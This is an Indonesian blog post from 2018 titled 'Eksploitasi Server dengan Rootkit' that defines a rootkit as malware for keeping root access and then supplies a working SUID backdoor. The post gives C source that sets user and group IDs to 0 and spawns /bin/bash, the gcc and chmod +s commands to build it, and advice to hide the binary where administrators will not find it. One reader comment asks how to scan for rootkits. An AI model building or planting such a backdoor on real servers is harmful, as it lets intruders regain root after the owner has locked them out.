Minggu, 25 November 2018

Eksploitasi Server dengan Rootkit


Mungkin banyak yang bertanya-tanya, Apa itu Rootkit? Apa yang dimaksud dengan Rootkit? Fungsi Rootkit?
OK! disini akan kita bahas secara singkat tentang Rootkit dan bagaimana Rootkit itu bekerja.

Rootkit adalah perangkat lunak jahat (malware) yang digunakan untuk mempertahankan hak akses tertinggi pada aplikasi maupun sistem operasi. Saat seorang hacker berhasil mendapatkan hak akses tertinggi yang setara dengan Administrator/Super Admin/Root biasanya untuk berjaga-jaga kalau user tertinggi tersebut diambil kembali oleh pemilik aslinya sang hacker biasanya memasang Rootkit terlebih dahulu untuk berjaga-jaga. disinilah peran Rootkit bekerja, supaya sang hacker dapat mentakeover user tersebut secara mudah.

* Ingat Rootkit dapat dipasang bilamana Super User berhasil diretas sebelumnya, dan untuk menjaga user tersebut bilamana terjadi "sesuatu" seperti Password diganti/di-reset oleh admin aslinya.


Sebagai contoh disini saya memiliki sebuah Rootkit yang bekerja pada Shell Linux

Dengan mendapatkan rootnya kembali saya hanya mengexecute file yang bernama ./rootkit tersebut.


Cara memasang Shell Rootkit

Source Code rootkit.c:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
  setuid(0);
  setgid(0);
  system("/bin/bash");
  return 0;
}

Compile Rootkit tersebut:
# gcc rootkit.c -o rootkit

Berikan permission SUID:
# chmod +s rootkit

Taruhlah rootkit ditempat yang sulit ditemukan oleh admin.

Itulah contoh Rootkit untuk Server yang menggunakan sistem operasi Linux.
Sekian artikel tentang Rootkit, semoga bermanfaat.
Share:

3 komentar:

  1. cara scan rootkit di server kita bagaimana ya ? adakah utility atau tool khusus untuk mencarinya selain grep ?

    BalasHapus